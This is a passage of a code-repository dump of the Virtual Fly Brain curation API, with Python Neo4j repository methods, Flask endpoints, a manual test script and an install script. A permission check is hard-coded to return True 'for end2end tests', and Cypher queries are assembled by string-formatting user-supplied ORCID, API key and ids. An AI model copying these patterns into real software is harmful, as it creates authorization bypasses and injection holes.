self.get_dataset(datasetid, orcid):\n # return True\n # return False\n\n # TODO disabled permission checks for end2end tests\n return True\n\n def _marshal_project_from_neo(self, data):\n p = Project(id=data['short_name'])\n p.set_description(data['description'])\n p.set_start(data['start'])\n p.set_primary_name(data['primary_name'])\n return p\n\n def get_project(self, id, orcid):\n q = self._get_project_permission_clause(orcid,id) + self._get_project_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n p = self._marshal_project_from_neo(results[0])\n return p\n return None\n\n\n def get_dataset(self, id, orcid):\n q = self._get_dataset_permission_clause(orcid, id,extra_dataset=True) + self._get_dataset_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n d = self._neo_dataset_marshal(results[0])\n return d\n return None\n\n def _get_neuron(self, id, orcid):\n q = self._get_neuron_permission_clause(orcid,id)\n q = q + self._get_neuron_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n try:\n n = Neuron(primary_name=results[0]['primary_name'])\n n.set_id(id=results[0]['id'])\n n.set_alternative_names(results[0]['syns'])\n n.set_datasetid(results[0]['datasetid'])\n n.set_project_id(results[0]['projectid'])\n neuron_rels = self._get_neuron_relations(results[0]['id'])\n n.set_external_identifiers(neuron_rels['cross_references'])\n n.set_classification([neuron_rels['classification']])\n n.set_classification_comment(neuron_rels['classification_comment'])\n n.set_imaging_type(neuron_rels['imaging_type'])\n n.set_neuropils(neuron_rels['neuropils'])\n n.set_input_neuropils(neuron_rels['input_neuropils'])\n n.set_output_neuropils(neuron_rels['output_neuropils'])\n n.set_driver_line(neuron_rels['driver_line'])\n n.set_part_of(neuron_rels['part_of'])\n n.set_filename(neuron_rels['filename'])\n n.set_template_id(neuron_rels['template_id'])\n except Exception as e:\n print(e)\n return self.wrap_error([\"Neuron {} could not be retrieved\".format(id)], INVALID_NEURON)\n return n\n return self.wrap_error([\"Neuron {} could not be retrieved\".format(id)], INVALID_NEURON)\n\n def get_neuron(self, id, orcid):\n if isinstance(id,list):\n neurons = []\n for i in id:\n neurons.append(self._get_neuron(i,orcid))\n return neurons\n else:\n return self._get_neuron(id,orcid)\n\n def get_user(self, orcid, apikey=None):\n q = \"MATCH (p:Person {iri:'%s'\" % orcid\n if apikey:\n q = q + \", apikey: '%s'\" % apikey\n q = q + \"}) RETURN p.iri as id, p.label as primary_name, p.apikey as apikey, p.role as role, p.email as email\"\n results = self.query(q=q)\n if len(results) == 1:\n return User(results[0]['id'], results[0]['primary_name'], results[0]['apikey'],\n results[0]['role'], results[0]['email'])\n raise InvalidUserException(\"User with orcid id {} does not exist.\".format(orcid))\n\n def _neo_dataset_marshal(self,row):\n d = Dataset(id=row['id'], short_name=row['short_form'], title=row['title'])\n d.set_project_id(row['project'])\n d.set_publication(row['publication'])\n d.set_source_data(row['source_data'])\n d.set_description(row['description'])\n d.set_license(row['license'])\n return d\n\n def get_all_datasets(self,projectid, orcid):\n q = self._get_dataset_permission_clause(orcid=orcid, project=projectid, extra_dataset=True) + self._get_dataset_return_clause()\n results = self.query(q=q)\n datasets = []\n for row in results:\n #print(row)\n d = self._neo_dataset_marshal(row)\n datasets.append(d)\n return datasets\n\n def get_all_projects(self,orcid):\n q = self._get_project_permission_clause(orcid=orcid) + self._get_project_return_clause()\n results = self.query(q=q)\n projects = []\n for row in results:\n projects.append(self._marshal_project_from_neo(row))\n return projects\n\n def get_all_neurons(self, datasetid, orcid):\n q = self._get_neuron_permission_clause(orcid=orcid) + self._get_neuron_return_clause()\n results = self.query(q=q)\n neurons = []\n for row in results:\n # n = Neuron(primary_name=row['primary_name'], id=row['id'])\n # n.set_datasets([datasetid])\n n = Neuron(primary_name=row['primary_name'])\n n.set_id(row['id'])\n n.set_datasetid(datasetid)\n n.set_project_id(row['projectid'])\n neurons.append(n)\n return neurons\n\n def get_id_start_range(self, datasetid, orcid):\n q = self._get_dataset_permission_clause(orcid=orcid,datasetid=datasetid) + self._get_project_return_clause()\n results = self.query(q=q)\n if len(results) == 1:\n return results[0]['start']\n raise VFBError(\"No start range found for dataset {}, starting from 0.\".format(datasetid))\n\n ################################\n #### Data ingestion ############\n ################################\n\n def create_dataset(self, Dataset, project, orcid):\n errors = []\n if self.has_project_write_permission(project, orcid):\n if self.db_client==\"vfb\":\n datasetid = self.kb_owl_pattern_writer.add_dataSet(Dataset.title, Dataset.license, Dataset.short_name, pub=Dataset.publication,\n description=Dataset.description, dataset_spec_text='', site='')\n self.kb_owl_pattern_writer.commit()\n print(\"Determining success of added dataset by checking weather the log is empty.\")\n datasetid = Dataset.short_name\n if not self.kb_owl_pattern_writer.ec.log:\n q = \"MATCH (n:Project {iri: '%s'})\" % self._format_vfb_id(project,\"project\")\n q = q + \" MATCH (d:DataSet {iri: '%s'})\" % self._format_vfb_id(datasetid,\"reports\")\n q = q + \" MERGE (n)<-[:has_associated_project]-(d)\"\n print(q)\n result = self.query(q)\n print(result)\n return datasetid\n else:\n print(\"Added dataset: error log is not empty.\")\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_DATASET)\n else:\n raise IllegalProjectError(\n 'The project %s does not exist, or user with orcid %s does not have the required permissions. '\n 'Please send an email to [email protected] to register your project.' % (project, orcid))\n errors.append(\"An unknown error occurred\")\n return self.wrap_error(errors, UNKNOWNERROR)\n\n def create_neuron_db(self, neurons, datasetid, orcid):\n commit = True\n ids = []\n errors = []\n start = 0\n\n did = self._format_vfb_id(datasetid, \"reports\")\n if not self.has_dataset_write_permission(did, orcid):\n return self.wrap_error(\"No permissions to add images to datasets\", NO_PERMISSION)\n\n s = self.get_id_start_range(datasetid, orcid)\n if s > start:\n start = s\n for neuron in neurons:\n if isinstance(neuron, Neuron):\n try:\n success = self.add_neuron_db(neuron, datasetid, start)\n if success:\n ids.append(success)\n else:\n commit = False\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n except Exception as e:\n commit = False\n print(e)\n errors.append(\"{}\".format(e))\n else:\n print(\"{} is not a neuron\".format(neuron))\n if commit:\n commit_return = self.kb_owl_pattern_writer.commit()\n if commit_return:\n return ids\n else:\n errors.extend(self.kb_owl_pattern_writer.get_log())\n return self.wrap_error(errors, INVALID_NEURON)\n else:\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_NEURON)\n\n\n def add_neuron_db(self, Neuron, datasetid, start):\n # make sure datasetid is the short form.\n\n if self.db_client==\"vfb\":\n rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n dataset=datasetid,\n imaging_type=Neuron.imaging_type,\n label=Neuron.primary_name,\n start=start, # we need to do this on api level so that batching is not a bottleneck. we dont want 1 lookup per new image just to get the range!\n template=Neuron.template_id, #VFB id or template name\n anatomical_type=Neuron.classification[0], #default NEURON VFB/FBBT ID (short_form).\n type_edge_annotations={\"comment\": Neuron.classification_comment},\n anon_anatomical_types=self.get_anon_anatomical_types(Neuron),\n anatomy_attributes=self.get_anatomy_attributes(Neuron),\n dbxrefs=self.get_xrefs(Neuron.external_identifiers),\n image_filename=Neuron.filename,\n hard_fail=False)\n return rv['anatomy']['short_form']\n\n raise VFBError('Images cannot be added right now; please contact the VFB administrators.')\n\n def get_anatomy_attributes(self, neuron):\n aa = dict()\n if isinstance(neuron, Neuron) or isinstance(neuron, SplitDriver):\n syns = neuron.alternative_names\n if syns:\n # {\"synonyms\": ['a','b]}\n aa['synonyms'] = syns\n if neuron.comment:\n aa['comment'] = neuron.comment\n return aa\n\n def get_anon_anatomical_types(self, neuron):\n # [(r,o),(r2,o2)]\n aa = []\n if isinstance(neuron, Neuron) or isinstance(neuron, SplitDriver):\n aa = self._add_type(neuron.part_of, \"BFO_0000050\",aa)\n aa = self._add_type(neuron.driver_line, \"RO_0002292\", aa)\n aa = self._add_type(neuron.neuropils, \"RO_0002131\", aa)\n aa = self._add_type(neuron.input_neuropils, \"RO_0002110\", aa)\n aa = self._add_type(neuron.output_neuropils, \"RO_0002113\", aa)\n return aa\n\n def _add_type(self, n_typ, rel, l):\n if n_typ and isinstance(n_typ,list):\n for e in n_typ:\n l.append((rel,e))\n return l\n\n def get_xrefs(self, xrefs):\n aa = dict()\n if xrefs:\n # { GO: 001 }\n for xref in xrefs:\n aa[xref['resource_id']] = xref['external_id']\n return aa\n\n def create_project_db(self, Project):\n raise IllegalProjectError(\n 'Creating projects is currently not supported.')\n\n def create_neuron_type_db(self, Project):\n raise IllegalProjectError(\n 'Creating new neuron types is currently not supported.')\n\n def wrap_error(self,message_json,code):\n return { 'error': {\n \"code\": code,\n \"message\": message_json,\n }}\n\n def clear_neo_logs(self):\n self.kb_owl_pattern_writer.get_log()\n self.self.kb_owl_pattern_writer.ec.log\n\n def _get_split(self, splitid, orcid):\n q = \"MATCH (i \"\n if splitid:\n q = q + \"{iri: '%s'})\" % self._format_vfb_id(splitid, \"reports\")\n q = q + \" RETURN i.iri as id, i.label as label, i.synonyms as syns, i.xrefs as xrefs\"\n\n results = self.query(q=q)\n if len(results) == 1:\n try:\n s = Split(\"\", \"\")\n s.set_id(results[0]['id'])\n s.set_synonyms(results[0]['syns'])\n s.set_xrefs(results[0]['xrefs'])\n except Exception as e:\n print(\"Split could not be retrieved: {}\".format(e))\n return self.wrap_error([\"Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n return s\n return self.wrap_error([\"Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n\n def get_split(self, id, orcid):\n if isinstance(id, list):\n splits = []\n for i in id:\n splits.append(self._get_split(i, orcid))\n return splits\n else:\n return self._get_split(id, orcid)\n\n def create_split(self, split_data):\n if self.db_client == \"vfb\":\n s = split(synonyms=split_data.synonyms,\n dbd=split_data.dbd,\n ad=split_data.ad,\n xrefs=split_data.xrefs)\n response = self.feature_mover.gen_split_ep_feat([s])\n\n short_form = next(iter(response))\n result = response[short_form]['attributes']\n result['short_form'] = short_form\n result['iri'] = response[short_form]['iri']\n result['xrefs'] = response[short_form]['xrefs']\n return result\n\n raise VFBError('Splits cannot be added right now; please contact the VFB administrators.')\n\n def create_split_driver_db(self, split_drivers, datasetid, orcid, ep_split_flp_out):\n commit = True\n ids = []\n errors = []\n start = 0\n\n did = self._format_vfb_id(datasetid, \"reports\")\n if not self.has_dataset_write_permission(did, orcid):\n return self.wrap_error(\"No permissions to add images to datasets\", NO_PERMISSION)\n\n s = self.get_id_start_range(datasetid, orcid)\n if s > start:\n start = s\n for split_driver in split_drivers:\n if isinstance(split_driver, SplitDriver):\n try:\n success = self.add_split_driver_db(split_driver, datasetid, start, ep_split_flp_out)\n if success:\n ids.append(success)\n else:\n commit = False\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n except Exception as e:\n commit = False\n print(e)\n errors.append(\"{}\".format(e))\n else:\n print(\"{} is not a split driver\".format(split_driver))\n if commit:\n commit_return = self.kb_owl_pattern_writer.commit()\n if commit_return:\n return ids\n else:\n errors.extend(self.kb_owl_pattern_writer.get_log())\n return self.wrap_error(errors, INVALID_NEURON)\n else:\n errors.extend(self.kb_owl_pattern_writer.ec.log)\n return self.wrap_error(errors, INVALID_NEURON)\n\n def add_split_driver_db(self, split_driver: SplitDriver, datasetid, start, ep_split_flp_out):\n # make sure datasetid is the short form.\n if self.db_client==\"vfb\":\n aa = self.get_anon_anatomical_types(split_driver)\n if ep_split_flp_out:\n aa = self._add_type(split_driver.comment, \"BFO_0000050\", aa)\n aa = self._add_type(split_driver.classification, \"BFO_0000051\", aa)\n aa = self._add_type(split_driver.has_part, \"BFO_0000051\", aa)\n at = \"VFBext_0000004\" # 'expression pattern fragment'\n else:\n aa = self._add_type(split_driver.classification, \"BFO_0000051\", aa)\n aa = self._add_type(split_driver.has_part, \"BFO_0000051\", aa)\n if split_driver.driver_line and len(split_driver.driver_line) > 0:\n at = split_driver.driver_line[0]\n else:\n at = split_driver.comment # workaround since dl is not in pdb\n\n rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n dataset=datasetid,\n imaging_type=split_driver.imaging_type,\n label=split_driver.primary_name,\n start=start, # we need to do this on api level so that batching is not a bottleneck. we dont want 1 lookup per new image just to get the range!\n template=split_driver.template_id, #VFB id or template name\n anatomical_type=at, # should use driver_line, but this is workaround\n type_edge_annotations={\"comment\": split_driver.classification_comment},\n anon_anatomical_types=aa,\n anatomy_attributes=self.get_anatomy_attributes(split_driver),\n dbxrefs=self.get_xrefs(split_driver.external_identifiers),\n image_filename=split_driver.filename,\n hard_fail=False)\n return rv['anatomy']['short_form']\n\n raise VFBError('Images cannot be added right now; please contact the VFB administrators.')\n\n # def _get_split_ep(self, splitid, orcid):\n # q = \"MATCH (i \"\n # if splitid:\n # q = q + \"{iri: '%s'})\" % self._format_vfb_id(splitid, \"reports\")\n # q = q + \" RETURN i.iri as id, i.label as label, i.comment as comment, i.synonyms as syns, i.xrefs as xrefs\"\n #\n # results = self.query(q=q)\n # if len(results) == 1:\n # try:\n # s = EpSplit(results[0]['id'])\n # s.set_primary_name(results[0]['label'])\n # s.set_comment(results[0]['comment'])\n # s.set_synonyms(results[0]['syns'])\n # s.set_xrefs(results[0]['xrefs'])\n # except Exception as e:\n # print(\"EP/Split could not be retrieved: {}\".format(e))\n # return self.wrap_error([\"EP/Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n # return s\n # return self.wrap_error([\"EP/Split {} could not be retrieved\".format(id)], INVALID_SPLIT)\n\n # def get_split_ep(self, id, orcid):\n # if isinstance(id, list):\n # splits = []\n # for i in id:\n # splits.append(self._get_split_ep(i, orcid))\n # return splits\n # else:\n # return self._get_split_ep(id, orcid)\n #\n # def create_ep_split(self, ep_split_data):\n # if self.db_client == \"vfb\":\n # aa = []\n # if ep_split_data.neuron_annotations:\n # aa = self._add_type(ep_split_data.neuron_annotations, \"BFO_0000051\", aa) # has_part\n # rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n # label=ep_split_data.primary_name,\n # start=0,\n # anatomical_type=ep_split_data.expression_pattern,\n # anon_anatomical_types=aa,\n # anatomy_attributes=self.get_anatomy_attributes(Neuron),\n # dbxrefs=self.get_xrefs(ep_split_data.xrefs),\n # hard_fail=False)\n # return rv['anatomy']['short_form']\n #\n # raise VFBError('EP/Splits cannot be added right now; please contact the VFB administrators.')\n #\n # def create_ep_split_flp_out(self, ep_split_data):\n # if self.db_client == \"vfb\":\n # aa = []\n # if ep_split_data.neuron_annotations:\n # aa = self._add_type(ep_split_data.neuron_annotations, \"BFO_0000051\", aa) # has_part\n # if ep_split_data.expression_pattern:\n # aa = self._add_type(ep_split_data.expression_pattern, \"BFO_0000050\", aa) # part_of\n # rv = self.kb_owl_pattern_writer.add_anatomy_image_set(\n # label=ep_split_data.primary_name,\n # start=0,\n # anatomical_type='expression pattern fragment',\n # anon_anatomical_types=aa,\n # anatomy_attributes=self.get_anatomy_attributes(Neuron),\n # dbxrefs=self.get_xrefs(ep_split_data.xrefs),\n # hard_fail=False)\n # return rv['anatomy']['short_form']\n #\n # raise VFBError('EP/Splits cannot be added right now; please contact the VFB administrators.')\n\n\nclass IllegalProjectError(Exception):\n pass\n\nclass VFBError(Exception):\n pass\n\nclass NeuronNotExistsError(Exception):\n pass\n\nclass DatasetWithSameNameExistsError(Exception):\n pass\n\nclass ProjectIDSpaceExhaustedError(Exception):\n pass\n\nclass DatabaseNotInitialisedError(Exception):\n pass\n\nclass InvalidUserException(Exception):\n def __init__(self, message):\n self.message = message"
},
{
"alpha_fraction": 0.6469767689704895,
"alphanum_fraction": 0.6553488373756409,
"avg_line_length": 37.39285659790039,
"blob_id": "e3a5ce12eb09fc12d19e0636a7edb915d65a166c",
"content_id": "6f35bdfb14dd7208e3747d0d43d2f6c5535e9586",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2150,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 56,
"path": "/vfb_curation_api/api/vfbid/endpoints/dataset.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_dataset, valid_user\nfrom vfb_curation_api.api.vfbid.errorcodes import INVALID_APIKEY, UNKNOWNERROR\nfrom vfb_curation_api.api.vfbid.serializers import dataset\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('dataset', description='Operations related to datasets')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass DatasetResource(Resource):\n\n @api.response(201, 'Dataset successfully created.')\n @api.expect(dataset)\n def post(self):\n out = dict()\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n datasetid = create_dataset(request.json, orcid)\n if isinstance(datasetid, dict) and 'error' in datasetid:\n return datasetid, 403\n return datasetid, 201\n out['error'] = \"Invalid API Key\"\n out['code'] = INVALID_APIKEY\n return out, 403\n\n @api.response(404, 'Dataset not found.')\n @api.param('datasetid', 'Dataset id', required=True)\n @api.marshal_with(dataset)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('datasetid', required=True, type=str)\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n datasetid = args['datasetid']\n if valid_user(apikey, orcid):\n ds = db.get_dataset(datasetid, orcid)\n print(json.dumps(marshal(ds, dataset)))\n return ds, 201\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6214998364448547,
"alphanum_fraction": 0.6469262838363647,
"avg_line_length": 38.846153259277344,
"blob_id": "06789fb29546b110e098bdc76b1be75d43b460d5",
"content_id": "7cf72ac8c32727737d0d2220324766cc20873eb8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3107,
"license_type": "permissive",
"max_line_length": 700,
"num_lines": 78,
"path": "/vfb_curation_api/test/test_endpoints_manual.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import os\nimport requests\nimport json\nimport re\n\n# This run of tests is only necessary in absence of a proper testing system which I dont have yet\n\n\n\n# api-endpoint\napi = \"http://localhost:5000/api\"\n\nparams=dict()\nparams['orcid']=\"https://orcid.org/0000-0002-7356-1779\"\nparams['apikey']=\"xyz\"\n\n\nprint(\"Running endpoint tests\")\nfor file in os.listdir('data'):\n if file.endswith(\".json\") and file.startswith(\"payload\"):\n # sending get request and saving the response as response object\n with open('data/{}'.format(file)) as f:\n data = json.load(f)\n correct_answer_f = file.replace(\"payload_\",\"answer_\")\n with open('data/{}'.format(correct_answer_f)) as f:\n answer = json.load(f)\n endpoint=file.split(\"_\")[1]\n r = requests.post(url=\"{}/{}/\".format(api,endpoint), json=data,params=params)\n\n # extracting data in json format\n replacethis = \"http[:][/][/]virtualflybrain[.]org[/]reports[/]VFB[_][0-9]+\"\n data = r.json()\n data_s = json.dumps(data).strip()\n data_s = re.sub(replacethis, \"IRI\", data_s)\n answer_s = json.dumps(answer).strip()\n answer_s = re.sub(replacethis, \"IRI\", answer_s)\n if str(data_s) == str(answer_s):\n print(\"Test {} passed.\".format(file))\n else:\n print(\"Test {} FAILED.\".format(file))\n print(data_s)\n print(answer_s)\n\nprint(\"Testing get user endpoint\")\nr = requests.get(url=\"{}/{}/\".format(api,\"user\"), params=params)\ndata = r.json()\nassert data['orcid'] == \"https://orcid.org/0000-0002-7356-1779\"\nassert data['apikey'] == \"xyz\"\nassert 'primary_name' in data\nassert 'manages_projects' in data\n\nprint(\"Testing get all projects endpoint\")\nr = requests.get(url=\"{}/{}/\".format(api,\"projects\"), params=params)\ndata = r.json()\nassert 'primary_name' in data[0]\nassert 'id' in data[0]\nassert 'description' in data[0]\nassert 'start' in data[0]\n\nprint(\"Testing get project endpoint\")\nparams['projectid'] = \"ABCD\"\nr = requests.get(url=\"{}/{}/\".format(api,\"project\"), params=params)\ndata = r.json()\nassert 'primary_name' in data\nassert data['id'] == \"ABCD\"\nassert 'description' in data\nassert 'start' in data\n\nprint(\"Testing get neuron endpoint\")\nparams['neuronid'] = \"http://virtualflybrain.org/reports/VFB_0000ABCD\"\nr = requests.get(url=\"{}/{}/\".format(api,\"neuron\"), params=params)\ndata = r.json()\nassert 'error' in data\n\n\n\n\n#[{\"id\": \"http://virtualflybrain.org/reports/VFB_00005975\", \"primary_name\": \"Neuron XYZ superspaced\", \"datasetid\": \"http://virtualflybrain.org/data/Zoglu2020\", \"projectid\": \"http://virtualflybrain.org/project/ABCD\", \"alternative_names\": [\"Neuron XYZ superspac\", \"Neuron XY-Z sspac\"], \"external_identifiers\": [{\"resource_id\": \"FlyBrain_NDB\", \"external_id\": \"12\"}, {\"resource_id\": \"FlyBase\", \"external_id\": \"1\"}], \"classification\": \"http://purl.obolibrary.org/obo/FBbt_00005106\", \"classification_comment\": null, \"template_id\": \"VFB_00017894\", \"imaging_type\": \"computer graphic\", \"filename\": \"test1.png\", \"driver_line\": [], \"neuropils\": [], \"part_of\": [], \"input_neuropils\": [], \"output_neuropils\": []}]"
},
{
"alpha_fraction": 0.6558345556259155,
"alphanum_fraction": 0.6617429852485657,
"avg_line_length": 38.82352828979492,
"blob_id": "29fe3fee650c59604c2801b929a8043a737791e4",
"content_id": "2b8da3e036089630bf2711c88d8428a9268a795b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2031,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 51,
"path": "/vfb_curation_api/api/vfbid/endpoints/neuron_type.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport json\nfrom flask import request\nfrom flask_restplus import Resource, reqparse, marshal\nfrom vfb_curation_api.api.vfbid.business import create_neuron_type, valid_user\nfrom vfb_curation_api.api.vfbid.serializers import neuron_type\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('neuron_type', description='Operations related to neuron types')\n\n\[email protected]('/')\[email protected]('apikey', 'Your valid API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass DatasetResource(Resource):\n\n @api.response(201, 'Dataset successfully created.')\n @api.expect(neuron_type)\n @api.marshal_with(neuron_type)\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n neuron_type_id = create_neuron_type(request.json, orcid)\n return db.get_neuron_type(neuron_type_id, orcid), 201\n return \"{ error: 'Invalid API Key' }\"\n\n @api.response(404, 'Dataset not found.')\n @api.param('neuron_type_id', 'VFB id of neuron type', required=True)\n @api.marshal_with(neuron_type)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n parser.add_argument('neuron_type_id', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n neuron_type_id = args['neuron_type_id']\n if valid_user(apikey, orcid):\n ds = db.get_neuron_type(neuron_type_id, orcid)\n print(json.dumps(marshal(ds, neuron_type)))\n return ds, 201\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.5892857313156128,
"alphanum_fraction": 0.5892857313156128,
"avg_line_length": 27,
"blob_id": "9e6a0eb4214ccb5dca335176859e404fb9756c56",
"content_id": "6f2b2ccce66495bfd35c455b9510924b56413c33",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 56,
"license_type": "permissive",
"max_line_length": 41,
"num_lines": 2,
"path": "/README.md",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "# Curation REST API for Virtual Fly Brain\n=============\n"
},
{
"alpha_fraction": 0.6896551847457886,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 18.44444465637207,
"blob_id": "542c7d95e9395a760af0f397ec81f19821dc3537",
"content_id": "0284b9f71248f5310c3b28d9955f12654d45e442",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 174,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 9,
"path": "/vfb_curation_api/install_neo4j.sh",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\nmkdir -p tmp\ncd tmp\nrm -rf VFB_neo4j\ngit clone --quiet https://github.com/VirtualFlyBrain/VFB_neo4j.git\ncd ..\nrm -rf vfb/*\ncp -r tmp/VFB_neo4j/src/uk vfb"
},
{
"alpha_fraction": 0.6803044676780701,
"alphanum_fraction": 0.6831588745117188,
"avg_line_length": 31.84375,
"blob_id": "ad66b6760fba503e345a449a0f6bd8dc683db9b9",
"content_id": "16bb75d35d8b6b3e5e0a4dae9700d0b8199e461d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1051,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 32,
"path": "/vfb_curation_api/api/vfbid/endpoints/projects.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\n\nfrom flask_restplus import Resource, reqparse\nfrom vfb_curation_api.api.vfbid.serializers import project\nfrom vfb_curation_api.api.vfbid.business import valid_user\nfrom vfb_curation_api.api.restplus import api\nfrom vfb_curation_api.database.repository import db\n\n\nlog = logging.getLogger(__name__)\n\nns = api.namespace('projects', description='Operations related to lists of projects')\n\n\[email protected]('/')\[email protected](404, 'No projects found.')\[email protected]('apikey','Your API Key', required=True)\[email protected]('orcid', 'Your ORCID', required=True)\nclass ProjectList(Resource):\n\n @api.marshal_with(project)\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('apikey', type=str, required=True)\n parser.add_argument('orcid', type=str, required=True)\n args = parser.parse_args()\n apikey = args['apikey']\n orcid = args['orcid']\n if valid_user(apikey, orcid):\n m = db.get_all_projects(orcid)\n return m\n return \"{ error: 'Invalid API Key' }\"\n"
},
{
"alpha_fraction": 0.6608695387840271,
"alphanum_fraction": 0.7565217614173889,
"avg_line_length": 18.16666603088379,
"blob_id": "b7bef3ff3a8940df818d821fad7a07baea805ef6",
"content_id": "cf832c6340eb6c5565fe5f88982d027f14257c47",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 20,
"num_lines": 6,
"path": "/vfb_curation_api/api/vfbid/errorcodes.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "UNKNOWNERROR=-1\nINVALID_NEURON = 10\nNO_PERMISSION = 11\nINVALID_APIKEY = 12\nINVALID_DATASET = 13\nINVALID_SPLIT = 14\n"
},
{
"alpha_fraction": 0.6309328675270081,
"alphanum_fraction": 0.6423895359039307,
"avg_line_length": 26.155555725097656,
"blob_id": "36ac49e40e4d97c414806a450bde2d03745ba31b",
"content_id": "b95613e79576acf575c6890373a4abc4f9bcf98f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "permissive",
"max_line_length": 105,
"num_lines": 45,
"path": "/vfb_curation_api/api/restplus.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
"text": "import logging\nimport traceback\n\nfrom flask_restplus import Api\nfrom vfb_curation_api import settings\nfrom sqlalchemy.orm.exc import NoResultFound\n\nlog = logging.getLogger(__name__)\n\nauthorizations = {\n 'apikey': {\n 'type': 'apiKey',\n 'in': 'header',\n 'name': 'X-API'\n },\n 'oauth2': {\n 'type': 'oauth2',\n 'flow': 'accessCode',\n 'tokenUrl': 'https://orcid.org/oauth/token',\n 'authorizationUrl': 'https://orcid.org/oauth/authorize',\n 'redirect_uri' : 'http://localhost:5000/api',\n 'scopes': {\n '/authenticate': 'No API call. Client retrieves access token only.',\n }\n }\n}\n\napi = Api(version='1.0', title='VFB Identifier API',\n description='An API for creating and updating VFB identifiers.', authorizations=authorizations)\n\n\n\[email protected]\ndef default_error_handler(e):\n message = 'An unhandled exception occurred.'\n log.exception(message)\n\n if not settings.FLASK_DEBUG:\n return {'message': message}, 500\n\n\[email protected](NoResultFound)\ndef database_not_found_error_handler(e):\n log.warning(traceback.format_exc())\n return {'message': 'A database result was required but none was found.'}, 404\n"
},
{
"alpha_fraction": 0.6722737550735474,
"alphanum_fraction": 0.6774942278862,
"avg_line_length": 39.093021392822266,
"blob_id": "3a11c7e827ab234dc4092d3c917258dc1f3bd5f7",
"content_id": "8e1015fc65ce18c836ea857b4595abc6a7304376",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1724,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 43,
"path": "/vfb_curation_api/api/vfbid/endpoints/project.py",
"repo_name": "VirtualFlyBrain/vfb-data-ingest-api",
"src_encoding": "UTF-8",
